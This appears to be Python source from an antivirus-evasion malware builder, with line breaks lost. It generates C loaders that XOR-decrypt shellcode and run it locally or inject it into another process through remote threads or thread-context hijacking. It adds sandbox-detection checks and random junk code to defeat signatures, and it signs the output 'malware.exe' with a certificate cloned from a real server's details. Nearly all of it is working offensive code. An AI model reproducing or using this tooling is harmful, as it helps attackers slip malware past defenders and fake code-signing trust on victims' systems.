def twin_tower(H): randbig1 = str(randrange(10 * H, 99 * H, 10)) randbig2 = str(randrange(10 * H, 77 * H, 10)) randcpt = core.varname_creator() randcpt2 = core.varname_creator() junkcode = "int " + randcpt + " = " + randbig1 + ";\n" junkcode += "int " + randcpt2 + " = " + randbig2 + ";\n" junkcode += "while ( " + randcpt + " > 0 ){\n" junkcode += "if (" + randcpt + " > " + randcpt2 + "){\n" junkcode += randcpt + " = " + randcpt + " - 1;\n" junkcode += "}else{\n" junkcode += randcpt2 + " = " + randcpt2 + " - 1;}}\n" return junkcode
def fibonacci(H): rand1 = core.varname_creator() rand2 = core.varname_creator() rand3 = core.varname_creator() rand4 = core.varname_creator() rand5 = core.varname_creator() randbignumb = str(randint(10 * H, 99 * H)) junkcode = "int " + rand1 + " = 0," + rand2 + " = 1," + rand3 + "," + rand4 + "," + rand5 + " = 0;\n" junkcode += rand4 + " = " + randbignumb + ";\n" junkcode += "while (" + rand5 + " < " + rand4 + "){\n" junkcode += rand3 + " = " + rand1 + " + " + rand2 + ";\n" + rand5 + "++;\n" junkcode += rand1 + "=" + rand2 + ";\n" + rand2 + " = " + rand3 + ";}\n" return junkcode
def ceil_routine_2(H): randranges = str(randint(10 * H, 99 * H)) randvar = core.varname_creator() randvar2 = core.varname_creator() randflag = core.varname_creator() junkcode = "int " + randflag + " = -1;\n" junkcode += "double *" + randvar + " = (double*)malloc(sizeof(double)*" + randranges + ");\n" junkcode += "double *" + randvar2 + " = (double*)malloc(sizeof(double)*" + randranges + ");\n" junkcode += "do{\n" junkcode += randflag + "++;\n" junkcode += randvar + "[" + randflag + "] = (double)(rand() % 1000) / (double)(rand() % 70);\n" junkcode += randvar2 + "[" + randflag + "] = ceil(" + randvar + "[" + randflag + "]);}while(" + randflag + " < " + randranges + "-1);\n" return junkcode
def fake_u(value, junkcode, intensity): number_of_decoy = value if number_of_decoy != "": transform_to_int = int(number_of_decoy) number_of_decoy = 0 decoy_code = "" while number_of_decoy != transform_to_int: number_of_decoy += 1 memdmp1 = core.varname_creator() tac1 = core.varname_creator() tick1 = core.varname_creator() memdmp1_value = str(random.randint(30000000, 330000000)) decoy_code += "char * " + memdmp1 + "= NULL;\n" decoy_code += junk.junk_inject(junkcode, "code", intensity) decoy_code += memdmp1 + " = (char *)malloc(" + memdmp1_value + ");\n" decoy_code += junk.junk_inject(junkcode, "code", intensity) decoy_code += "if (" + memdmp1 + " != NULL)\n" decoy_code += "{\n" decoy_code += junk.junk_inject(junkcode, "code", intensity) decoy_code += "memset(" + memdmp1 + ", 00, " + memdmp1_value + ");\n" decoy_code += junk.junk_inject(junkcode, "code", intensity) decoy_code += "}\n" decoy_code += junk.junk_inject(junkcode, "code", intensity) decoy_code += "int " + tick1 + " = GetTickCount();\n" decoy_code += junk.junk_inject(junkcode, "code", intensity) decoy_code += "Sleep(1000);\n" decoy_code += junk.junk_inject(junkcode, "code", intensity) decoy_code += "int " + tac1 + " = GetTickCount();\n" decoy_code += junk.junk_inject(junkcode, "code", intensity) decoy_code += "if ((" + tac1 + " - " + tick1 + ") < 1000)\n" decoy_code += "{\n" decoy_code += junk.junk_inject(junkcode, "code", intensity) decoy_code += "exit(0);\n" decoy_code += "}\n" decoy_code += junk.junk_inject(junkcode, "code", intensity) decoy_code += "free(" + memdmp1 + ");\n" decoy_code += junk.junk_inject(junkcode, "code", intensity) core.decoy_added() return decoy_code elif number_of_decoy == "": return ""
def geometric_2(H): randranges = str(randint(10 * H, 99 * H)) randsum = core.varname_creator() randflag = core.varname_creator() randdiv = core.varname_creator() junkcode = "double " + randsum + "=0;\n" junkcode += "double " + randdiv + "=1;\n" junkcode += "int " + randflag + "=0;\n" junkcode += "do{\n" junkcode += randflag + " += 1;\n" junkcode += randdiv + "=" + randdiv + "* 2;\n" junkcode += randsum + " = " + randsum + " + (1 / " + randdiv + ");\n" junkcode += "if(" + randsum + " == 1.00)break;}while(" + randflag + " < " + randranges + ");\n" return junkcode
def primes_number_sos(H): randarraysize = core.varname_creator() randranges = str(randint(10 * H, 99 * H)) randprimevar = core.varname_creator() randprimenumb = core.varname_creator() randsizevar = core.varname_creator() isprime = core.varname_creator() randn = core.varname_creator() randflag = core.varname_creator() randflag2 = core.varname_creator() junkcode = "int " + randflag + "," + randflag2 + ";\n" junkcode += "int " + randprimevar + " = 0;\n" junkcode += "int " + randarraysize + " = " + randranges + ";\n" junkcode += "int " + randn + " = " + randranges + " / 2;\n" junkcode += "int " + randsizevar + ";\n" junkcode += "int* " + isprime + " = (int*)malloc(sizeof(int) * (" + randarraysize + " + 1));\n" junkcode += "for(" + randflag + " = 0;" + randflag + " < " + randn + ";" + randflag + "++){\n" junkcode += isprime + "[" + randflag + "] = " + randflag + ";}\n" junkcode += "for(" + randflag + " = 1;" + randflag + " < " + randn + ";" + randflag + "++){\n" junkcode += "for(" + randflag2 + " = " + randflag + ";" + randflag2 + " <= (" + randn + " - " + randflag + ")/(2 * " + randflag + " + 1);" + randflag2 + "++){\n" junkcode += isprime + "[" + randflag + " + " + randflag2 + " + 2 * " + randflag + " + " + randflag2 + "] = 0;}}\n" junkcode += "if(" + randarraysize + " > 2){\n" junkcode += isprime + "[" + randprimevar + "++] = 2;}\n" junkcode += "for(" + randflag + " = 1;" + randflag + " < " + randn + ";" + randflag + "++){\n" junkcode += "if(" + isprime + "[" + randflag + "] != 0){\n" junkcode += isprime + "[" + randprimevar + "++] = " + randflag + " * 2 + 1;}}\n" junkcode += randsizevar + " = sizeof " + isprime + " / sizeof(int);\n" junkcode += "int " + randprimenumb + " = 0;\n" junkcode += "for(" + randflag + " = 0;" + randflag + " < " + randsizevar + ";" + randflag + "++){\n" junkcode += "if(" + isprime + "[" + randflag + "] != 0){\n" junkcode += randprimenumb + " ++;}}\n" junkcode += "free(" + isprime + ");\n" return junkcode
def reverse_array_2(H): randranges = str(randint(10 * H, 99 * H)) randvar = core.varname_creator() randrevvar = core.varname_creator() randflag = core.varname_creator() randLenght = core.varname_creator() junkcode = "int " + randflag + ";\n" junkcode += "int* " + randvar + " = (int*)malloc(sizeof(int) * " + randranges + ");\n" junkcode += "int* " + randrevvar + " = (int*)malloc(sizeof(int) * " + randranges + ");\n" junkcode += "int " + randLenght + " = " + randranges + " - 1;\n" junkcode += "for(" + randflag + " = 0;" + randflag + " < " + randranges + ";" + randflag + "++){\n" junkcode += randvar + "[" + randflag + "] = rand() % 300;\n" junkcode += randrevvar + "[" + randflag + "] = " + randvar + "[" + randLenght + "];\n" junkcode += randLenght + " = " + randLenght + " - 1;}\n" junkcode += "free(" + randvar + ");free(" + randrevvar + ");\n" return junkcode
def decrypt_stub(encrypted_shellcode, key): eshellcode = core.varname_creator() dkey = core.varname_creator() vshellcode = core.varname_creator() j = core.varname_creator() i = core.varname_creator() stub = "char " + eshellcode + "[]=" + '"' + encrypted_shellcode + '";\n' stub += "char " + dkey + "[]=" + '"' + key + '";\n' stub += "char " + vshellcode + "[sizeof " + eshellcode + "];\n" stub += "int " + j + "=0;\n" stub += "for (int " + i + "=0; " + i + "< sizeof " + eshellcode + "; " + i + "++){\n" stub += "if (" + j + "== sizeof " + dkey + "-1) " + j + "=0;\n" stub += vshellcode + "[" + i + "]=" + eshellcode + "[" + i + "] ^ " + dkey + "[" + j + "];\n" stub += j + "++;}\n" return vshellcode, stub
def back_to_zero(H): randbig1 = str(randrange(10 * H, 99 * H, 10)) randcpt = core.varname_creator() junkcode = "int " + randcpt + " = " + randbig1 + ";\n" junkcode += "while ( " + randcpt + " > 0 ){\n" junkcode += randcpt + " = " + randcpt + " - 1;}\n" return junkcode
def random_numbers(H): randranges = str(randint(10 * H, 99 * H)) randvarr = core.varname_creator() randflag = core.varname_creator() randflag2 = core.varname_creator() junkcode = "int " + randflag + "," + randflag2 + " = 0;\n" junkcode += "float* " + randvarr + " = (float*)malloc(sizeof(float) * " + randranges + ");\n" junkcode += "for(" + randflag + " = 0;" + randflag + " < " + randranges + ";" + randflag + "++){\n" junkcode += randflag2 + " = rand() % 400;\n" junkcode += "if(" + randflag2 + " > 360){\n" junkcode += randvarr + "[" + randflag + "] = 0;\n" junkcode += "}else if(" + randflag2 + " < 0){\n" junkcode += randvarr + "[" + randflag + "] = 0;\n" junkcode += "}else{\n" junkcode += randvarr + "[" + randflag + "] = " + randflag2 + " * 0.1 / 360;\n}}" junkcode += "free(" + randvarr + ");\n" return junkcode
def local_ti(vshellcode, decoder_stub): execs = core.varname_creator() lti = decoder_stub lti += f"\nvoid *{execs} = VirtualAlloc(0, sizeof {vshellcode}, MEM_COMMIT, PAGE_EXECUTE_READWRITE);\n" lti += f"memcpy({execs}, {vshellcode}, sizeof {vshellcode});\n" lti += f"((void(*)()){execs})();\n" lti += "}" return lti
def average_2(H): randranges = str(randint(10 * H, 99 * H)) randsum = core.varname_creator() randsum2 = core.varname_creator() randaverage = core.varname_creator() randvar = core.varname_creator() randflag = core.varname_creator() junkcode = "int " + randflag + ";\n" junkcode += "int " + randsum + " = 0;int " + randsum2 + " = 0;\n" junkcode += "int* " + randvar + " = (int*)malloc(sizeof(int) * " + randranges + ");\n" junkcode += "float " + randaverage + ";\n" junkcode += "for(" + randflag + " = 0;" + randflag + " < " + randranges + ";" + randflag + "++){\n" junkcode += randvar + "[" + randflag + "] = rand() % 25;\n" junkcode += randsum + " = " + randsum + " + " + randvar + "[" + randflag + "];}\n" junkcode += randaverage + "/((float)" + randranges + ");\n" junkcode += "free(" + randvar + ");\n" return junkcode
def primes_number_soe(H): randranges = str(randint(10 * H, 99 * H)) randprimevar = core.varname_creator() randvar = core.varname_creator() randflag = core.varname_creator() randflag2 = core.varname_creator() junkcode = "unsigned long long int " + randflag + "," + randflag2 + ";\n" junkcode += "int *" + randprimevar + ";\n" junkcode += "int " + randvar + " = 1;\n" junkcode += randprimevar + " = (int*)malloc(sizeof(int) * " + randranges + ");\n" junkcode += "for(" + randflag + " = 2;" + randflag + " < " + randranges + ";" + randflag + "++){\n" junkcode += randprimevar + "[" + randflag + "] = 1;}\n" junkcode += "for(" + randflag + " = 2;" + randflag + " < " + randranges + ";" + randflag + "++){\n" junkcode += "if(" + randprimevar + "[" + randflag + "]){\n" junkcode += "for(" + randflag2 + " = " + randflag + ";" + randflag + " * " + randflag2 + " < " + randranges + ";" + randflag2 + "++){\n" junkcode += randprimevar + "[" + randflag + " * " + randflag2 + "] = 0;}}}\n" junkcode += "free(" + randprimevar + ");\n" return junkcode
def odd_or_even_2(H): randranges = str(randint(10 * H, 99 * H)) randvar = core.varname_creator() randflag = core.varname_creator() randodd = core.varname_creator() randeven = core.varname_creator() junkcode = "int " + randflag + ";\n" junkcode += "int *" + randvar + " = (int*)malloc(sizeof(int)*" + randranges + ");\n" junkcode += "int " + randodd + " = 0;\n" junkcode += "int " + randeven + " = 0;\n" junkcode += "for(" + randflag + " = 0;" + randflag + " < " + randranges + ";" + randflag + "++){\n" junkcode += randvar + "[" + randflag + "] = rand() % 1000;\n" junkcode += "if(" + randvar + "[" + randflag + "]&1){\n" junkcode += randodd + " += 1;\n" junkcode += "}else if(!(" + randvar + "[" + randflag + "]&1)){\n" junkcode += randeven + " += 1;}}\n" junkcode += "free(" + randvar + ");\n" return junkcode
def last_armstrong(H): randranges = str(randint(10 * H, 99 * H)) randvar = core.varname_creator() randvar2 = core.varname_creator() randflag = core.varname_creator() randflag2 = core.varname_creator() randLastArmN = core.varname_creator() junkcode = "int " + randLastArmN + ";\n" junkcode += "int " + randvar + "," + randflag + "," + randvar2 + "," + randflag2 + ";\n" junkcode += "for(" + randflag + " = 1;" + randflag + " <= " + randranges + ";" + randflag + "++){\n" junkcode += randvar + " = 0;\n" junkcode += randvar2 + " = " + randflag + ";\n" junkcode += "while(" + randvar2 + " != 0){\n" junkcode += randflag2 + " = " + randvar2 + "%10;\n" junkcode += randvar + " += " + randflag2 + "*" + randflag2 + "*" + randflag2 + ";\n" junkcode += randvar2 + " = " + randvar2 + "/10;}\n" junkcode += "if(" + randvar + " == " + randflag + "){\n" junkcode += randLastArmN + " = " + randflag + ";}}\n" return junkcode
def remote_thread_injection(processname, vShellcode, decoder_stub, junkcode, intensity): entry = core.varname_creator() snapshot = core.varname_creator() process_handle = core.varname_creator() remote_thread = core.varname_creator() remote_buffer = core.varname_creator() rti = decoder_stub rti += junk.junk_inject(junkcode, "code", intensity) rti += "\nPROCESSENTRY32 " + entry + ";\n" rti += junk.junk_inject(junkcode, "code", intensity) rti += entry + ".dwSize = sizeof(PROCESSENTRY32);\n" rti += junk.junk_inject(junkcode, "code", intensity) rti += "HANDLE " + snapshot + " = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);\n" rti += junk.junk_inject(junkcode, "code", intensity) rti += "if (Process32First(" + snapshot + ", &" + entry + ") == TRUE)\n" rti += "{\n" rti += junk.junk_inject(junkcode, "code", intensity) rti += "while (Process32Next(" + snapshot + ", &" + entry + ") == TRUE)\n" rti += "{\n" rti += junk.junk_inject(junkcode, "code", intensity) rti += 'if (stricmp(' + entry + '.szExeFile, ' + '"' + processname + '"' + ') == 0)' rti += '{\n' rti += junk.junk_inject(junkcode, "code", intensity) rti += "HANDLE " + process_handle + ";\n" rti += junk.junk_inject(junkcode, "code", intensity) rti += "HANDLE " + remote_thread + ";\n" rti += junk.junk_inject(junkcode, "code", intensity) rti += "PVOID " + remote_buffer + ";\n" rti += junk.junk_inject(junkcode, "code", intensity) rti += process_handle + " = OpenProcess(PROCESS_ALL_ACCESS, FALSE, " + entry + ".th32ProcessID);\n" rti += junk.junk_inject(junkcode, "code", intensity) rti += remote_buffer + " = VirtualAllocEx(" + process_handle + ", NULL, sizeof " + vShellcode + ", (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);\n" rti += junk.junk_inject(junkcode, "code", intensity) rti += "WriteProcessMemory(" + process_handle + ", " + remote_buffer + ", " + vShellcode + ", sizeof " + vShellcode + ", NULL);\n" rti += junk.junk_inject(junkcode, "code", intensity) rti += remote_thread + " = CreateRemoteThread(" + process_handle + ", NULL, 0, (LPTHREAD_START_ROUTINE)" + remote_buffer + ", NULL, 0, NULL);\n" rti += junk.junk_inject(junkcode, "code", intensity) rti += "CloseHandle(" + process_handle + ");}}}\n" rti += "CloseHandle(" + snapshot + ");" rti += "}\n" return rti
def local_thread_injection(vShellcode, decoder_stub, junkcode, intensity): execs = core.varname_creator() lti = decoder_stub lti += junk.junk_inject(junkcode, "code", intensity) lti += "\nvoid *" + execs + " = VirtualAlloc(0, sizeof " + vShellcode + ", MEM_COMMIT, PAGE_EXECUTE_READWRITE);\n" lti += junk.junk_inject(junkcode, "code", intensity) lti += "memcpy(" + execs + ", " + vShellcode + ", sizeof " + vShellcode + ");\n" lti += junk.junk_inject(junkcode, "code", intensity) lti += "((void(*)())" + execs + ")();\n" lti += "}\n" return lti
def buble_sort_float_array(H): randranges = str(randint(10 * H, 99 * H)) randvar = core.varname_creator() randvar2 = core.varname_creator() randflag = core.varname_creator() randflag2 = core.varname_creator() junkcode = "float *" + randvar + " = (float*)malloc(sizeof(float)*" + randranges + ");\n" junkcode += "int " + randflag + ";\n" junkcode += "int " + randflag2 + ";\n" junkcode += "float " + randvar2 + ";\n" junkcode += "for(" + randflag + " = 0;" + randflag + " < " + randranges + ";" + randflag + "++){\n" junkcode += randvar + "[" + randflag + "] = (float)(rand() % 1000) / (float)(rand() % 70);}\n" junkcode += "for(" + randflag + " = 0;" + randflag + " < " + randranges + ";" + randflag + "++){\n" junkcode += "for(" + randflag2 + " = 0;" + randflag2 + " < (" + randranges + " - " + randflag + " - 1);" + randflag + "++){\n" junkcode += "if(" + randvar + "[" + randflag + "] > " + randvar + "[" + randflag2 + " + 1]){" junkcode += randvar2 + " = " + randvar + "[" + randflag2 + "];\n" junkcode += randvar + "[" + randflag2 + "] = " + randvar + "[" + randflag + " + 1];\n" junkcode += randvar + "[" + randflag2 + " + 1] = " + randvar2 + ";}}}\n" junkcode += "free(" + randvar + ");\n" return junkcode
def gnome_sort_int_array(H): randranges = str(randint(10 * H, 99 * H)) randvar = core.varname_creator() randtemp = core.varname_creator() randflag = core.varname_creator() junkcode = "int *" + randvar + " = (int*)malloc(sizeof(int)*" + randranges + ");\n" junkcode += "int " + randflag + ";\n" junkcode += "int " + randtemp + ";\n" junkcode += "for(" + randflag + " = 0;" + randflag + " < " + randranges + ";" + randflag + "++){\n" junkcode += randvar + "[" + randflag + "] = rand() % 10000;}\n" junkcode += randflag + "=0;\n" junkcode += "while(" + randflag + " < " + randranges + "){\n" junkcode += "if(" + randflag + " == 0 || " + randvar + "[" + randflag + "-1] <= " + randvar + "[" + randflag + "]){\n" junkcode += randflag + "++;\n" junkcode += "}else{\n" junkcode += randtemp + " = " + randvar + "[" + randflag + "-1];\n" junkcode += randvar + "[" + randflag + "-1] = " + randvar + "[" + randflag + "];\n" junkcode += randvar + "[" + randflag + "] = " + randtemp + ";\n" junkcode += randflag + " = " + randflag + "-1;}}\n" junkcode += "free(" + randvar + ");\n" return junkcode
def rc_info_maker(filename, require_admin): rc_info = "" if require_admin == "yes": filename = filename.replace("output", "tmp") + '.manifest"' rc_info += '1 MANIFEST "' + filename + "\n" admin_privs(filename) rc_info += "1 VERSIONINFO\n" rc_info += "FILEVERSION " + str(rc_version()) + "," + str(rc_version()) + "\n" rc_info += "PRODUCTVERSION " + str(rc_version()) + "," + str(rc_version()) + "\n" rc_info += "BEGIN\n" + 'BLOCK "StringFileInfo"\n' rc_info += "BEGIN\n" rc_info += 'BLOCK "080904E4"\n' rc_info += 'BEGIN\n' rc_info += 'VALUE "CompanyName", "' + str(core.varname_creator()) + '"\n' rc_info += 'VALUE "FileDescription", "' + str(core.varname_creator()) + '"\n' rc_info += 'VALUE "FileVersion", "' + str(rc_version()) + "." + str(rc_version()) + '"\n' rc_info += 'VALUE "InternalName", "' + str(core.varname_creator()) + '"\n' rc_info += 'VALUE "LegalCopyright", "' + str(core.varname_creator()) + '"\n' rc_info += 'VALUE "OriginalFilename", "' + str(core.varname_creator()) + '"\n' rc_info += 'VALUE "ProductName", "' + str(core.varname_creator()) + '"\n' rc_info += 'VALUE "ProductVersion", "' + str(rc_version()) + "." + str(rc_version()) + '"\n' rc_info += 'END\n' rc_info += 'END\n' rc_info += 'BLOCK "VarFileInfo"\n' rc_info += 'BEGIN\n' rc_info += 'VALUE "Translation", 0x809, 1252\n' rc_info += 'END\n' rc_info += 'END\n' return rc_info
def spoofer(host, port, filename, out): try: ogcert = get_server_certificate((host, int(port))) x509 = crypto.load_certificate(crypto.FILETYPE_PEM, ogcert) certDir = Path('certs') certDir.mkdir(exist_ok=True) # Creating Fake Certificate CNCRT = certDir / (host + ".crt") CNKEY = certDir / (host + ".key") PFXFILE = certDir / (host + ".pfx") # Creating Keygen k = crypto.PKey() k.generate_key(crypto.TYPE_RSA, ((x509.get_pubkey()).bits())) cert = crypto.X509() # Setting Cert details from loaded from the original Certificate cert.set_version(x509.get_version()) cert.set_serial_number(x509.get_serial_number()) cert.set_subject(x509.get_subject()) cert.set_issuer(x509.get_issuer()) cert.set_notBefore(x509.get_notBefore()) cert.set_notAfter(x509.get_notAfter()) cert.set_pubkey(k) cert.sign(k, 'sha256') CNCRT.write_bytes(crypto.dump_certificate(crypto.FILETYPE_PEM, cert)) CNKEY.write_bytes(crypto.dump_privatekey(crypto.FILETYPE_PEM, k)) try: pfx = crypto.PKCS12() except AttributeError: pfx = crypto.PKCS12Type() pfx.set_privatekey(k) pfx.set_certificate(cert) pfxdata = pfx.export() PFXFILE.write_bytes(pfxdata) args = ("osslsigncode", "sign", "-pkcs12", PFXFILE, "-n", core.varname_creator(), "-i", TIMESTAMP_URL, "-in", filename, "-out", out) call(args, stdout=PIPE) core.exe_signed() system(f"mv output/malware.exe {filename} && rm -rf certs/") except Exception as ex: print("[X] Something Went Wrong!\n[X] Exception: " + str(ex))
def number_of_core(junkcode, intensity): evasion_funcname = "void " + core.varname_creator() + "(void)\n" sysguide = core.varname_creator() xcore = core.varname_creator() evasion_func = evasion_funcname evasion_func += "{\n" evasion_func += junk.junk_inject(junkcode, "code", intensity) evasion_func += "SYSTEM_INFO " + sysguide + ";\n" evasion_func += junk.junk_inject(junkcode, "code", intensity) evasion_func += "GetSystemInfo(&" + sysguide + ");\n" evasion_func += junk.junk_inject(junkcode, "code", intensity) evasion_func += "int " + xcore + " = " + sysguide + ".dwNumberOfProcessors;\n" evasion_func += junk.junk_inject(junkcode, "code", intensity) evasion_func += "if (" + xcore + " < 2)\n" evasion_func += "{\n" evasion_func += junk.junk_inject(junkcode, "code", intensity) evasion_func += "exit(0);\n" evasion_func += "}\n" evasion_func += junk.junk_inject(junkcode, "code", intensity) evasion_func += "}\n\n" evasion_funcname = replace_string(evasion_funcname) return evasion_funcname, evasion_func
def my_name_is(filename, junkcode, intensity): evasion_funcname = "void " + core.varname_creator() + "(char *args)\n" b = core.varname_creator() filename = filename.replace('output/', '') evasion_func = evasion_funcname evasion_func += "{\n" evasion_func += junk.junk_inject(junkcode, "code", intensity) evasion_func += 'if (strstr(args, "' + filename + '") > 0)\n' evasion_func += "{\n" evasion_func += "int " + b + " = 0;\n" evasion_func += junk.junk_inject(junkcode, "code", intensity) evasion_func += "}\n" evasion_func += "else" evasion_func += "{\n" evasion_func += junk.junk_inject(junkcode, "code", intensity) evasion_func += "exit(0);\n" evasion_func += "}\n" evasion_func += junk.junk_inject(junkcode, "code", intensity) evasion_func += "}\n\n" evasion_funcname = evasion_funcname.replace("(char *args)", "(argv[0])") evasion_funcname = replace_string(evasion_funcname) return evasion_funcname, evasion_func
def shaker_snort(H): randranges = str(randint(10 * H, 99 * H)) randflag = core.varname_creator() randflag2 = core.varname_creator() randtemp = core.varname_creator() randvar = core.varname_creator() junkcode = "int " + randflag + ";\n" junkcode += "int *" + randvar + " = (int*)malloc(sizeof(int)*" + randranges + ");\n" junkcode += "for(" + randflag + " = 0;" + randflag + " < " + randranges + ";" + randflag + "++){\n" junkcode += randvar + "[" + randflag + "] = rand() % 10000;}\n" junkcode += "int " + randflag2 + ";\n" junkcode += "int " + randtemp + ";\n" junkcode += "for (" + randflag2 + " = 1; " + randflag2 + " <= " + randranges + " / 2; " + randflag2 + "++){\n" junkcode += "for (" + randflag + " = " + randflag2 + " - 1; " + randflag + " < " + randranges + " - " + randflag2 + "; " + randflag + "++){\n" junkcode += "if (" + randvar + "[" + randflag + "] > " + randvar + "[" + randflag + "+1]){\n" junkcode += randtemp + " = " + randvar + "[" + randflag + "];\n" junkcode += randvar + "[" + randflag + "] = " + randvar + "[" + randflag + "+1];\n" junkcode += randvar + "[" + randflag + "+1] = " + randtemp + ";}}\n" junkcode += "for (" + randflag + " = " + randranges + " - " + randflag2 + " - 1; " + randflag + " >= " + randflag2 + "; " + randflag + "--){\n" junkcode += "if (" + randvar + "[" + randflag + "] < " + randvar + "[" + randflag + "-1]){\n" junkcode += randtemp + " = " + randvar + "[" + randflag + "];\n" junkcode += randvar + "[" + randflag + "] = " + randvar + "[" + randflag + "-1];\n" junkcode += randvar + "[" + randflag + "-1] = " + randtemp + ";}}}\n" return junkcode
def remote_pth(procname, vshellcode, decoder_stub, arch): entry = core.varname_creator() snapshot0 = core.varname_creator() targetProcessHandle = core.varname_creator() remoteBuffer = core.varname_creator() threadHijacked = core.varname_creator() snapshot1 = core.varname_creator() threadEntry = core.varname_creator() context = core.varname_creator() contextArch = "Rip" if arch == "x86": contextArch = "Eip" rpth = decoder_stub rpth += f"\nPROCESSENTRY32 {entry};" rpth += f"{entry}.dwSize = sizeof(PROCESSENTRY32);" rpth += f"HANDLE {snapshot0} = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);" rpth += f"if (Process32First({snapshot0}, &{entry}) == TRUE)" + "{" rpth += f"while (Process32Next({snapshot0}, &{entry}) == TRUE)" + "{" rpth += f'if (stricmp({entry}.szExeFile, "{procname}") == 0)' + "{" rpth += f"HANDLE {targetProcessHandle};" rpth += f"PVOID {remoteBuffer};" rpth += f"HANDLE {threadHijacked }= NULL;" rpth += f"HANDLE {snapshot1};" rpth += f"THREADENTRY32 {threadEntry};" rpth += f"CONTEXT {context};" rpth += f"{context}.ContextFlags = CONTEXT_FULL;" rpth += f"{threadEntry}.dwSize = sizeof(THREADENTRY32);" rpth += f"{targetProcessHandle} = OpenProcess(PROCESS_ALL_ACCESS, FALSE, {entry}.th32ProcessID);" rpth += f"{remoteBuffer} = VirtualAllocEx({targetProcessHandle}, NULL, sizeof {vshellcode}, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);" rpth += f"WriteProcessMemory({targetProcessHandle}, {remoteBuffer}, {vshellcode}, sizeof {vshellcode}, NULL);" rpth += f"{snapshot1} = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);" rpth += f"Thread32First({snapshot1}, &{threadEntry});" rpth += f"while (Thread32Next({snapshot1}, &{threadEntry}))" + "{" rpth += f"if ({threadEntry}.th32OwnerProcessID == {entry}.th32ProcessID)" + "{" rpth += f"{threadHijacked} = OpenThread(THREAD_ALL_ACCESS, FALSE, {threadEntry}.th32ThreadID);" + "break;}}" rpth += f"SuspendThread({threadHijacked});" rpth += f"GetThreadContext({threadHijacked}, &{context});" rpth += f"{context}.{contextArch} = (DWORD_PTR){remoteBuffer};" rpth += f"SetThreadContext({threadHijacked}, &{context});" rpth += f"ResumeThread({threadHijacked});" + "}}}" rpth += f"CloseHandle({snapshot0});" + "}" return rpth
def average_variance_stanard_and_deviation_2(H): randranges = str(randint(10 * H, 99 * H)) randsum = core.varname_creator() randsum2 = core.varname_creator() randaverage = core.varname_creator() randvariance = core.varname_creator() randdevstd = core.varname_creator() randvar = core.varname_creator() randflag = core.varname_creator() junkcode = "int " + randsum + " = 0;int " + randsum2 + " = 0;\n" junkcode += "int *" + randvar + " = (int*)malloc(sizeof(int)*" + randranges + ");\n" junkcode += "float " + randaverage + "," + randvariance + "," + randdevstd + ";\n" junkcode += "int " + randflag + ";\n" junkcode += "for(" + randflag + " = 0;" + randflag + " < " + randranges + ";" + randflag + "++){\n" junkcode += randvar + "[" + randflag + "] = rand() % 35;\n" junkcode += randsum + " = " + randsum + " + " + randvar + "[" + randflag + "];}\n" junkcode += randaverage + "/((float)" + randranges + ");\n" junkcode += "for(" + randflag + " = 0;" + randflag + " < " + randranges + ";" + randflag + "++){\n" junkcode += randsum2 + " = " + randsum2 + " + pow((" + randvar + "[" + randflag + "]" + " - " + randaverage + "),2);}\n" junkcode += randvariance + " = " + randsum2 + "/((float)" + randranges + ");\n" junkcode += randdevstd + " = sqrt(" + randvariance + ");\n" junkcode += "free(" + randvar + ");\n" return junkcode
def junk_inject(junk, method, intensity): funcname = "" func = "" code = "" if junk == "yes": number = 0 if method == "code": number += randint(4, 8) else: number += randint(64, 128) injection = 0 while injection != number: injection += 1 H = intensity random_func = randint(1, 52) funccode = "" if random_func == 1: funccode += sum_first_n_integer_1(H) elif random_func == 2: funccode += sum_first_n_inter_2(H) elif random_func == 3: funccode += fibonacci(H) elif random_func == 4: funccode += twin_tower(H) elif random_func == 5: funccode += back_to_zero(H) elif random_func == 6: funccode += back_to_num_1(H) elif random_func == 7: funccode += back_to_num_2(H) elif random_func == 8: funccode += primes_number_soe(H) elif random_func == 9: funccode += primes_number_sos(H) elif random_func == 10: funccode += average_1(H) elif random_func == 11: funccode += average_2(H) elif random_func == 12: funccode += average_variance_stanard_and_deviation_1(H) elif random_func == 13: funccode += average_variance_stanard_and_deviation_2(H) elif random_func == 14: funccode += reverse_array_1(H) elif random_func == 15: funccode += reverse_array_2(H) elif random_func == 16: funccode += double_reverse_array_1(H) elif random_func == 17: funccode += double_reverse_array_2(H) elif random_func == 18: funccode += random_numbers(H) elif random_func == 19: funccode += buble_sort_int_array(H) elif random_func == 20: funccode += buble_sort_float_array(H) elif random_func == 21: funccode += gnome_sort_int_array(H) elif random_func == 22: funccode += last_armstrong(H) elif random_func == 23: funccode += odd_or_even_1(H) elif random_func == 24: funccode += odd_or_even_2(H) elif random_func == 25: funccode += ceil_routine_1(H) elif random_func == 26: funccode += ceil_routine_2(H) elif random_func == 27: funccode += floor_routine_1(H) elif random_func == 28: funccode += floor_routine_2(H) elif random_func == 29: funccode += acos_routine_1(H) elif random_func == 30: funccode += acos_routine_2(H) elif random_func == 31: funccode += asin_routine_1(H) elif random_func == 32: funccode += asin_routine_2(H) elif random_func == 33: funccode += atan_routine_1(H) elif random_func == 34: funccode += atan_routine_2(H) elif random_func == 35: funccode += fabs_routine_1(H) elif random_func == 36: funccode += fabs_routine_2(H) elif random_func == 37: funccode += exp_routine_1(H) elif random_func == 38: funccode += exp_routine_2(H) elif random_func == 39: funccode += ln_routine_1(H) elif random_func == 40: funccode += ln_routine_2(H) elif random_func == 41: funccode += log10_routine_1(H) elif random_func == 42: funccode += log10_routine_2(H) elif random_func == 43: funccode += fmod_routine_1(H) elif random_func == 44: funccode += fmod_routine_2(H) elif random_func == 45: funccode += ldexp_routine_1(H) elif random_func == 46: funccode += ldexp_routine_2(H) elif random_func == 47: funccode += geometric_1(H) elif random_func == 48: funccode += geometric_2(H) elif random_func == 49: funccode += geometric_3(H) elif random_func == 50: funccode += geometric_4(H) elif random_func == 51: funccode += geometric_5(H) elif random_func == 52: funccode += shaker_snort(H) if method == "code": code += funccode else: evasion_funcname = "void " + core.varname_creator( ) + "(void)\n" func += evasion_funcname func += "{\n" func += funccode func += "}\n" funcname += evasion.replace_string(evasion_funcname) if method == "code": return code else: return funcname, func else: if method == "code": return "" else: return "", ""
